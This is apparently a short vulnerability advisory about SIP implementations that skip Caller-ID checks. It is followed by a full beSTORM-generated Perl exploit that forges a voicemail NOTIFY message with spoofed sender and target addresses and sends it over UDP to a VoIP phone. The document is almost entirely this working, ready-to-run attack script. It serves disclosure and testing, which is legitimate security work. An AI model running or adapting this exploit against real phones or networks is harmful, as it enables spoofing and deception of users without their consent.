|
|
|
|
| |
As reported earlier, many SIP implementations do not perform proper Caller-ID checks. This allows an attacker to spoof various NOTIFY messages, such as call-waiting and voice-mail.
For more information see: Notify Message Spoofing Vulnerability With VoIP Phones |
| |
Credit:
The information has been provided by beSTORM.
|
| |
#!/usr/bin/perl -w
# Exploit generated by beSTORM on 2005-07-08 17:49
# All Rights Reserved - Copyright (tm)
use IO::Socket;
use strict;
my $target = shift;
my $print_usage = 0;
my $repeated_type = "A";
if (!$target)
{
usage();
print "No target has been supplied, reverting to 192.168.3.10.\n";
$target = "192.168.3.10";
}
my $attackerip = shift;
if (!$attackerip)
{
usage();
print "Attacker IP address has not been supplied, reverting to 192.168.3.52.\n";
$attackerip = "192.168.3.52";
}
my $attackedip = shift;
if (!$attackedip)
{
usage();
print "Contact IP address has not been supplied, reverting to 192.168.3.9.\n";
$attackedip = "192.168.3.9";
}
print "Will attack $target.\n";
print "Attacker IP address defined as: $attackerip\n";
print "Attacked IP address defined as: $attackedip\n";
my $target_port = 5060;
my $packet =<<END;
NOTIFY sip:username:password\@$attackerip SIP/2.0\r
To: <sip:$attackedip:$target_port>\r
Via: SIP/2.0/UDP $attackedip:5060;branch=000000000000000\r
From: "asterisk" <sip:asterisk\@$attackedip>;tag=000000000\r
Contact: <sip:asterisk\@$attackerip>\r
Call-ID: 3121$attackedip\r
CSeq: 102 NOTIFY\r
User-Agent: Asterisk PBX\r
Event: message-summary\r
Content-Type: application/simple-message-summary\r
Max-Forwards: 70\r
Content-Length: 37\r
\r
Messages-Waiting: yes\r
Voicemail: 3/2\r
END
print "Sending: [$packet]\n";
print "Length: ".length($packet)."\n";
socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp"));
my $ipaddr = inet_aton($target);
my $sendto = sockaddr_in($target_port,$ipaddr);
send(PING, $packet, 0, $sendto) == length($packet) or die "cannot send to $target : $target_port : $!\n";
print "Done.\n";
sub usage
{
if ($print_usage) { return; }
$print_usage = 1;
print ("#"x50);
print "\n";
print "# $0 [hostname] [repeater] [attackerip] [attackedip]\n";
print "# hostname\t-\tThe host the packet will be sent to.\n";
print "# repeater\t-\tThe number of times the character will be sent (repeated character $repeated_type).\n";
print "# attackerip\t-\tThe IP address from which the packet should be\n";
print "\t\t\taddressed from (doesn't have to be your IP address).\n";
print "# attackedip\t-\tThe IP address that you are contacting\n";
print "\t\t\t(doesn't have to be the hostname IP's address).\n";
print "\n";
print "Results may vary depending on how the remote host handles packets.\n";
print "For example:\n";
print " * Some SIP Proxies won't look into packets addressed to it (attackedip or attackerip).\n";
print " * Some SIP Routers won't handle packets that aren't addressed to it.\n";
print "etc\n";
print "\n";
}
|
|
|
|
|
